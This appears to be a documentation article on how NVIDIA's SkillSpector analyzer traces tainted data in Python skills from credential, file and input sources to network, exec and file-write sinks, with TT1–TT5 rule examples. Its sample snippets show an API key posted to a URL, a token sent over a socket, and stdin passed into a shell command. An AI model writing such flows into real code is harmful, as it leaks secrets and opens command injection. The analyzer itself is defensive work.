# How SkillSpector Taint Tracking Analyzes Data Flows from Sources to Sinks

> Discover how SkillSpector's taint tracking analyzes Python data flows from sources to sinks. Learn how it traces credentials, inputs, and sensitive data to detect security risks. Explore TT1-TT5 findings.

- Repository: [NVIDIA Corporation/SkillSpector](https://github.com/NVIDIA/SkillSpector)
- Tags: deep-dive
- Published: 2026-07-08

---

**SkillSpector's taint tracking analyzer examines Python files using AST traversal to mark data from sources (credentials, file reads, network inputs) and trace it through assignments, f-strings, and containers until it reaches dangerous sinks (network writes, exec calls, file writes), emitting findings categorized as TT1–TT5.**

NVIDIA's SkillSpector employs a **behavioral taint-tracking** analyzer to detect security vulnerabilities in Python-based skills. By building an abstract syntax tree (AST) for each `.py` file and tracking how data moves from sensitive origins to dangerous destinations, the tool identifies potential data leaks and code injection risks. This analysis examines the implementation in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py) and its supporting modules to map exactly how data flows are detected.

## How SkillSpector Defines Sources and Sinks

### Source Categories and Detection

The analyzer defines four explicit source groups in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py): `_CREDENTIAL_SOURCES` (e.g., `os.getenv`), `_FILE_READ_SOURCES` (e.g., `open`), `_NETWORK_INPUT_SOURCES` (e.g., `requests.get`), and `_USER_INPUT_SOURCES` (e.g., `input`). When the AST visitor encounters an assignment statement (`ast.Assign`), the right-hand side expression is scanned via `_find_source_in_expr`. If a call matches one of these source sets, the left-hand side variables are marked as tainted through `_mark_targets`.

### Sink Resolution and Dynamic Imports

Sinks are aggregated in the `_ALL_SINKS` collection, covering network outputs, exec-related functions, and file-write APIs. During traversal, each `ast.Call` node is resolved to its canonical name via `_resolve_sink_name`, which also handles dynamic imports such as `importlib.import_module(...).run`. This resolution ensures that even indirectly invoked sinks are identified for flow analysis.

## The Three-Phase Taint Analysis Process

### Phase 1: Source Identification and Variable Marking

When processing assignments, the analyzer first checks if the right-hand side contains a direct source call. If no direct source is found, the system invokes `_find_tainted_in_expr` to propagate taint from previously marked variables. This mechanism enables tracking through chained assignments, allowing patterns like `payload = secret` or `msg = f"{secret}"` to remain correctly flagged as tainted throughout the data lifecycle.

### Phase 2: Sink Detection and Name Resolution

During the AST walk, the analyzer evaluates every `ast.Call` node against the `_ALL_SINKS` definitions. The `_resolve_sink_name` function normalizes the call to its fully qualified name, accounting for import aliases and dynamic module loading. Matching calls are retained for the final flow-mapping phase.

### Phase 3: Mapping Data Flows and Rule Selection

The analyzer distinguishes between two flow types when mapping sources to sinks:

- **Direct flows** – The `_find_nested_sources` function searches sink argument trees for source calls that appear inside the sink invocation (e.g., `requests.post(open("token").read())`). When found, `_pick_rule` selects the most specific rule ID (TT3–TT5) based on the source and sink categories; otherwise, the generic TT1 rule is applied.

- **Indirect flows** – After propagation, `_find_tainted_names_in_args` examines sink arguments for references to tainted variables. These flows receive the TT2 classification, indicating that tainted data reached the sink through intermediate variables or containers.

Each discovered flow is emitted as an `AnalyzerFinding` containing the rule ID, severity, file location, a human-readable message, and the matched code snippet (`matched_text`). These findings are later transformed into the generic `Finding` type by [`static_runner.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_runner.py) for final reporting.

## Code Examples of Taint Flow Detection

The following examples demonstrate how SkillSpector classifies different data flow patterns:

### Direct Source-to-Sink Flow (TT3)

```python
import os, requests
secret = os.getenv("API_KEY")
requests.post("https://example.com/ingest", data=secret)

```

The analyzer marks `os.getenv` as a credential source, identifies `requests.post` as a network-output sink, and emits a **TT3** finding indicating that a credential is sent over the network.

### Indirect Flow Through Containers (TT2)

```python
import os, socket
token = os.getenv("TOKEN")
payload = {"auth": token}
socket.socket().sendall(str(payload).encode())

```

Here, `token` becomes tainted via the source, `_mark_targets` records it, and later `_find_tainted_names_in_args` discovers that `payload` (a dictionary containing the tainted token) reaches the `sendall` sink, producing a **TT2** finding for indirect flow.

### Taint Propagation via F-Strings (TT5)

```python
import sys, subprocess
user_cmd = sys.stdin.read()
cmd = f"ls {user_cmd}"
subprocess.run(cmd, shell=True)

```

`sys.stdin.read` is recognized as a user-input source. The f-string propagates the taint through `_find_tainted_in_expr`, and `subprocess.run` (an exec sink) triggers a **TT5** finding because external input flows into code execution.

## Key Implementation Files

Understanding the taint tracking architecture requires familiarity with these specific files in the NVIDIA/SkillSpector repository:

- **[`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py)** – Contains the core implementation, including source/sink definitions (`_CREDENTIAL_SOURCES`, `_ALL_SINKS`), the AST visitor logic, and the `node` entry point (lines 22–40).
- **[`common.py`](https://github.com/NVIDIA/SkillSpector/blob/main/common.py)** – Provides utility helpers for import alias resolution and type-map building used during name resolution.
- **[`static_runner.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_runner.py)** – Integrates the analyzer into the SkillSpector pipeline and handles the conversion from `AnalyzerFinding` to the generic `Finding` type.
- **[`state.py`](https://github.com/NVIDIA/SkillSpector/blob/main/state.py)** – Holds the `SkillspectorState` that supplies file contents via `file_cache` and manages the component list fed to the analyzer.
- **[`tests/nodes/analyzers/test_behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/tests/nodes/analyzers/test_behavioral_taint_tracking.py)** – Verifies source-to-sink detection, reassignment propagation, container handling, and f-string propagation.

## Summary

- SkillSpector uses AST-based analysis in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py) to track data from four source categories to sink APIs.
- Taint propagates through assignments, f-strings, and containers via `_find_tainted_in_expr` and `_find_tainted_names_in_args`.
- Direct flows receive specific rule IDs (TT3–TT5) via `_pick_rule`, while indirect flows are classified as TT2.
- The `node` method orchestrates analysis across all Python files, skipping oversized files and aggregating `AnalyzerFinding` results.

## Frequently Asked Questions

### What is the entry point for SkillSpector's taint analysis?

The public `node` method in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py) serves as the primary entry point. It iterates over every `.py` component in the skill, skips files that exceed size limits, and aggregates all `AnalyzerFinding` objects into the final report that is converted to the generic `Finding` type.

### How does SkillSpector handle dynamic imports when detecting sinks?

The analyzer uses `_resolve_sink_name` to resolve `ast.Call` nodes to their canonical fully qualified names, including support for dynamic imports like `importlib.import_module(...).run`. This ensures that sinks invoked through runtime module loading are still correctly identified and analyzed for taint flows.

### What distinguishes TT1 findings from TT2 findings in SkillSpector?

TT1 represents a generic or direct source-to-sink flow without specific categorization, while TT2 specifically indicates an **indirect flow** where tainted data reaches a sink through intermediate variables or containers (e.g., a tainted value stored in a dictionary that is later passed to a network function).

### How does taint propagate through string formatting operations?

When processing f-strings or other string concatenations, `_find_tainted_in_expr` examines the expression components. If any referenced variable is already marked as tainted, the resulting string variable inherits the taint status, allowing the analyzer to detect flows like `cmd = f"ls {user_cmd}"` before they reach execution sinks.